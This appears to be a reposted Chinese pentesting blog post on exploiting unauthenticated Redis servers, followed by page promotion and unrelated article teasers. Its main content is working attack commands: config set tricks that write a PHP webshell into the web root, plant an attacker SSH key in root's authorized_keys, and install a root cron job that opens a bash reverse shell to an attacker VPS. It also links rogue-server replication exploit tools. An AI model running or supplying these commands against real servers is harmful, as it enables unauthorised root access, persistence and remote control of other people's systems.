Redis漏洞利用

未授权

可以利用超级弱口令工具来判断redis是否能未授权登录

telnet 
#尝试登录info
#查看redis信息

RCE方法

写shell

  • 需要写权限
  • 需要知道web网站路径
config set dir /var/www/html
config set dbfilename redis.php
set test "<?php phpinfo(); ?>"
save

写SSH key

  • 需要写入到 /.ssh 权限

创建秘钥

cd /root/.ssh/
ssh-keygen -t rsa
config set dir /root/.ssh/
config set dbfilename authorized_keys
set test "\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCvhnGwlnksH9fuSnIUrcB9B07lgK9LOttwAGdCB0SxhTXElvZ3o6ZLtncQrJhDM30pjFuk17bFqzYmPNMnTEA3IueJ2/kuNBNsfax+7vMV9vwycm4v2bCGdIxRaSeQ8j0y613JC6ZJMHynEOAPe9k6r+K788iUXE0CJ2kPib7Cee9tGduoUKLwuPUwpJnFc+5feOtBv3NNiSBjb42c3vHNg/mWHYf6FD9JfgIC1rScNiFv+pOwUJQbsbfO7JFgSkBFqBwO5TtI60m/NSL+H3DNQqZ+1rlOzYnMqLs5Eh8dqqigN4DUskd5u8HRNBdp4o94yvcwEbcr2WpVE7S2Ztdfa2+IuB9gdoSa84iVLNzMMoqUFewTbBZPKPYh5uzhuECbrmmsEQZG/VeQM5ErgjC7n01Xsvykh7/zsVUWL3qOQv2VdbbCzIelZS912uyx/gZ3U6JMh5F3Ggza/1qQHyVPejOmVZLJADH+6TAXr9rdxp6pbDY0P0jTUP8DjsE5avE= f1ve@hacker\n\n"
save
ssh -i id_rsa root@ip

写计划任务

  • 写入权限
  • 仅适用于Centos

set x "\n* * * * * bash -i >& /dev/tcp/vps ip/55555 0>&1\n"
config set dir /var/spool/cron/
config set dbfilename root
save

主从复制

利用以下的工具来进行主从复制

https://github.com/n0b0dyCN/redis-rogue-server

https://github.com/vulhub/redis-rogue-getshell

参考:

6379 - Pentesting Redis | Chinese - Ht | HackTricks

 

微信公众号

扫一扫关注CatalyzeSec公众号

加入我们的星球,我们能提供:

1对1就业指导、面试模拟、Golang工具开发学习、Fofo高级会员、各公众号历史文章合集、各种网络安全电子书、面试题合集、最新poc、exp、最常用工具推荐、开放交流环境,解决成员问题。

 

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/815536.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

CF Educational Codeforces Round 164 Div.2 D. Colored Balls 题解

Colored Balls 题目描述 There are balls of n n n different colors; the number of balls of the i i i-th color is a i a_i ai​. The balls can be combined into groups. Each group should contain at most 2 2 2 balls, and no more than 1 1 1 ball of each c…

UI设计/交互设计/视觉设计项目汇报/作品集Figma/PPT模板

作为UI设计/交互设计/视觉设计师&#xff0c;创建作品集对于向潜在客户或雇主展示您的技能、创造力和风格至关重要。以下分步指南可帮助您创建令人印象深刻的作品集&#xff1a; 选择您的最佳作品&#xff1a;选择您最强大且最相关的设计项目&#xff0c;将其纳入您的作品集。…

AI人工智能讲师大模型培训讲师叶梓 大语言模型(LLM)在科学文献摘要领域的应用

大语言模型&#xff08;LLM&#xff09;在科学文献摘要领域的应用是一个前沿且迅速发展的技术趋势。通过结合GitHub上yobibyte的Compressor项目&#xff0c;我们可以深入探讨这一技术方案的潜力和实现方式。 技术背景 随着科学研究的快速发展&#xff0c;每天都有大量的科学文…

文件上传下载

文章目录 文件上传下载文件上传文件下载 文件上传下载 HTTP请求会包含一个请求头&#xff0c;其中"Content-Type"字段告诉服务器正在发送什么类型的数据。根据发送的数据类型&#xff0c;浏览器和服务器会采取适应的处理方式。 "multipart/form-data"是一…

基于8B/10BGT收发器的PHY层设计(1)

一、PHY层简介 PHY层&#xff08;Physical Layer&#xff09;是OSI模型中最低的一层&#xff0c;也是最基本的一层&#xff0c;PHY是物理接口收发器&#xff0c;它实现物理层。包括MII/GMII&#xff08;介质独立接口&#xff09;子层、PCS&#xff08;物理编码子层&#xff09…

王道汽车4S企业管理系统 SQL注入漏洞复现

0x01 产品简介 王道汽车4S企业管理系统(以下简称“王道4S系统”)是一套专门为汽车销售和维修服务企业开发的管理软件。该系统是博士德软件公司集10余年汽车行业管理软件研发经验之大成,精心打造的最新一代汽车4S企业管理解决方案。 0x02 漏洞概述 王道汽车4S企业管理系统…

SQL语言自用(持续更新)+实验记录

课本:《数据库原理及其应用教程》&#xff08;第四版&#xff09; (主编)黄德才&(副主编)陆亿红 实验&#xff1a;学校实验课材料 其他&#xff1a; [ ]表示可以被删除&#xff0c;也表示可以被替换&#xff0c;请自行判断。如果有一些截图或照片&#xff0c;是暂时懒得整…

5、LMDeploy 量化部署 LLMVLM实战(homework)

基础作业&#xff08;结营必做&#xff09; 完成以下任务&#xff0c;并将实现过程记录截图&#xff1a; 配置lmdeploy运行环境 由于环境依赖项存在torch&#xff0c;下载过程可能比较缓慢。InternStudio上提供了快速创建conda环境的方法。打开命令行终端&#xff0c;创建一…

富格林:专研正规技巧助力出金

富格林指出&#xff0c;现货黄金拥有诸多其他投资产品无法比拟的交易优势&#xff0c;如此一来吸引着越来越多投资者相继涌入现货黄金市场。但有不少投资者发现自己的出金效率与他人的有差异。为什么会这样呢&#xff1f;其实在现货黄金市场中需要有正规技巧的支持才可以更好地…

车牌校验正则表达式

1. 规则 传统车牌&#xff1a; 第一位为省份简称&#xff08;汉字&#xff09;&#xff0c;第二位为发牌机关代号&#xff08;A-Z的字母&#xff09;第3到第7位为序号&#xff08;由字母或数字组成&#xff0c;但不存在字母I和O&#xff0c;防止和数字1、0混淆&#xff0c;另外…

跨域问题CORS

所谓跨域访问&#xff0c;其底层就是访问是否同源的问题&#xff0c;跨域问题跟前端的关系不大&#xff0c;后台只要在服务器上配置好浏览器需要的 header 就可以解决跨域的问题。浏览器的请求为什么不能跨越&#xff0c;主要是为了安全&#xff0c;比如攻击者给用户发了一封邮…

鸿蒙开发快速入门

基本概念 ArkTS 因为ArkTS是基于Type Script扩展而来&#xff0c;是Type Script的超集&#xff0c;所以也可以关注一下Type Script的语法来理解ArkTS的语法 ArkUI HarmonyOS提供了一套UI开发框架&#xff0c;即方舟开发框架&#xff08;ArkUI框架&#xff09;。方舟开发框架…

【日常记录】【CSS】SASS循环的使用

文章目录 1、引言2、安装3、举例4、参考链接 1、引言 目前在任何项目框架中&#xff0c;都会有css 预处理器&#xff0c;目前一般使用 sass、less 这俩其中之一&#xff0c;它可以简化css的书写 Sass 是一款强化 CSS 的辅助工具&#xff0c;它在 CSS 语法的基础上增加了变量 (v…

【深度学习实战(2)】如何使用matplotlib.pyplot模块记录自己的训练,验证损失

一、matplotlib库 在我们自己训练模型时&#xff0c;常常会使用matplotlib库来绘制oss和accuracy的曲线图&#xff0c;帮助我们分析模型的训练表现。 matplotlib库安装&#xff1a;pip install matplotlib 二、代码 import matplotlib.pyplot as plt import torch import to…

Leetcode 3116. Kth Smallest Amount With Single Denomination Combination

Leetcode 3116. Kth Smallest Amount With Single Denomination Combination 1. 解题思路2. 代码实现 题目链接&#xff1a;3116. Kth Smallest Amount With Single Denomination Combination 1. 解题思路 这一题思路上我一开始想的是直接法&#xff0c;但是没想到什么好的方…

设计模式-组合模式(Composite Pattern)

1. 概念 组合模式是一种结构型设计模式&#xff0c;它允许将对象组合成树状的层次结构&#xff0c;用来表示“整体-部分”的关系。 2. 原理结构图 原理图 抽象角色&#xff08;Component&#xff09;&#xff1a;这是组合模式的核心&#xff0c;它定义了树叶和树枝构件的公…

vue3从精通到入门22:自定义 Hooks

自定义 Hooks 就是将可重用的逻辑抽象到一个函数中&#xff0c;这样你可以在不同的组件中重复使用这些逻辑&#xff0c;而不必重复编写相同的代码。 使用场景 1. 处理异步数据 当你需要在多个组件中处理异步数据时&#xff0c;可以创建一个自定义 Hook 来封装相关的逻辑。 …

【产品经理修炼之道】- 融资租赁相关业务介绍

一、什么是融资租赁&#xff1f; 根据《民法典》第735条的规定&#xff0c;融资租赁合同是出租人根据承租人对出卖人、租赁物的选择&#xff0c;向出卖人购买租赁物&#xff0c;提供给承租人使用&#xff0c;承租人支付租金的合同。 例如&#xff0c;A工厂因业务发展需要欲购置…

c/c++普通for循环学习

学习一下 for 循环的几种不同方式&#xff0c;了解一下原理及差异 完整的测试代码参考 GitHub &#xff1a;for 循环测试代码 1 常用形态 对于 for 循环来说&#xff0c;最常用的形态如下 for (表达式1; 表达式2; 表达式3) {// code }流程图如下&#xff1a; 编写测试代码…

stack和queue模拟实现

前言 上一期我们介绍了stack和queue的使用&#xff0c;本期我们来模拟实现一下他们&#xff01; 本期内容介绍 容器适配器 deque介绍 为什么stack和queue的底层选择deque为默认容器&#xff1f; stack 模拟现实 queue 模拟实现 什么是容器适配器&#xff1f; 适配器是一种设…